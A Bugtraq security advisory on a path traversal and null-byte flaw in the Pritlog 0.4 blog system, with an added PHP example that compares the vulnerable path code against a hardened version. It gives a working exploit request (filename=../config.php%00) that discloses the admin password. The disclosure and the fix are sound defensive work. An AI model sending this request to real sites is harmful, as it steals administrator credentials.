Printlog <= 0.4: Remote File Edition Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugtraq-owner@xxxxxxxxxxxxxxxxx
- Subject: Printlog <= 0.4: Remote File Edition Vulnerability
- From: Pepelux <pepelux@xxxxxxxxxxxx>
- Date: Wed, 1 Oct 2008 03:02:45 +0200
- Sender: pepeluxx@xxxxxxxxx
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Printlog <= 0.4: Remote File Edition Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$ Program: Printlog
$ File affected: index.php
$ Version: 0.4
$ Download: http://www.hardkap.net/pritlog
Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org
-- Description (by the author's page) --
PRITLOG is an extremely simple, small and powerful blog system. It does not
use or need a MYSQL database and fully works based on flat files. The idea
is derived from a similar app called PPLOG.
-- Bug --
Entries are viewed through the viewEntry option, with a URL such as:
http://localhost/p/index.php?option=viewEntry&filename=00001
viewEntry() (index.php, lines 709-714) takes the filename parameter from POST or GET and concatenates it straight into the post path without validating it:
709. function viewEntry() {
710.   $fileName = isset($_POST['filename'])?$_POST['filename']:$_GET['filename'];
711.   global $postdir, $separator, $newPostFile, $newFullPostNumber, $debugMode, $config_textAreaCols, $config_textAreaRows;
712.   global $config_allowComments, $config_commentsSecurityCode, $config_CAPTCHALength, $config_randomString;
713.   global $commentdir, $config_dbFilesExtension, $config_onlyNumbersOnCAPTCHA;
714.   $viewFileName = $postdir.$fileName.$config_dbFilesExtension;
-- Exploit --
Because $fileName is appended to $postdir unchecked, "../" walks out of the posts directory, and a trailing null byte drops the $config_dbFilesExtension suffix (PHP before 5.3.4 truncates file paths at the first NUL byte). The null byte only survives if magic_quotes_gpc is off; with it on, PHP escapes it to a literal \0 and the request fails. With magic quotes off you can do:
http://localhost/p/index.php?option=viewEntry&filename=../config.php%00
config.php holds the admin password, so a successful request discloses it.
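The path construction from viewEntry() next to a hardened version, as an added example written for this page (not Pritlog's code). $postdir, $config_dbFilesExtension and the filename parameter are the names from the advisory; the posts directory layout, the assumption that post names are five digits (as in the 00001 shown above), and the function names viewEntryVulnerable/viewEntrySafe are mine.

```php
<?php
// Added example, not Pritlog's own code. Names $postdir and
// $config_dbFilesExtension come from the advisory; the directory layout and
// the five-digit post-name rule are assumptions for this demonstration.

$postdir = __DIR__ . '/posts/';
$config_dbFilesExtension = '.txt';

// Vulnerable: the user-supplied name goes straight into the path.
// With magic_quotes_gpc off and a PHP version that truncated paths at a NUL
// byte (before 5.3.4), "../config.php%00" resolves to ../config.php.
function viewEntryVulnerable(string $fileName): string {
    global $postdir, $config_dbFilesExtension;
    return $postdir . $fileName . $config_dbFilesExtension;
}

// Hardened: accept only the post-number form the app generates (assumed
// here to be exactly five digits), then confirm the resolved path is still
// inside $postdir. Either check alone stops this bug; both is defence in depth.
function viewEntrySafe(string $fileName): ?string {
    global $postdir, $config_dbFilesExtension;
    if (!preg_match('/\A[0-9]{5}\z/', $fileName)) {
        return null;                     // rejects "..", "/", "\0", etc.
    }
    $real = realpath($postdir . $fileName . $config_dbFilesExtension);
    $base = realpath($postdir);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                     // missing file, or escaped $postdir
    }
    return $real;
}

// Constructed inputs: a legitimate post, plain traversal, traversal + NUL.
foreach (['00001', '../config.php', "../config.php\0"] as $input) {
    echo "input: " . addcslashes($input, "\0") . "\n";
    echo "  vulnerable path: " . addcslashes(viewEntryVulnerable($input), "\0") . "\n";
    echo "  hardened:        " . (viewEntrySafe($input) ?? 'rejected') . "\n";
}
```

The whitelist runs before realpath() so that on current PHP, which throws a ValueError for paths containing a NUL byte, the hardened path never sees the byte at all; the realpath containment check is what would also catch a future change to the naming scheme that let other characters through.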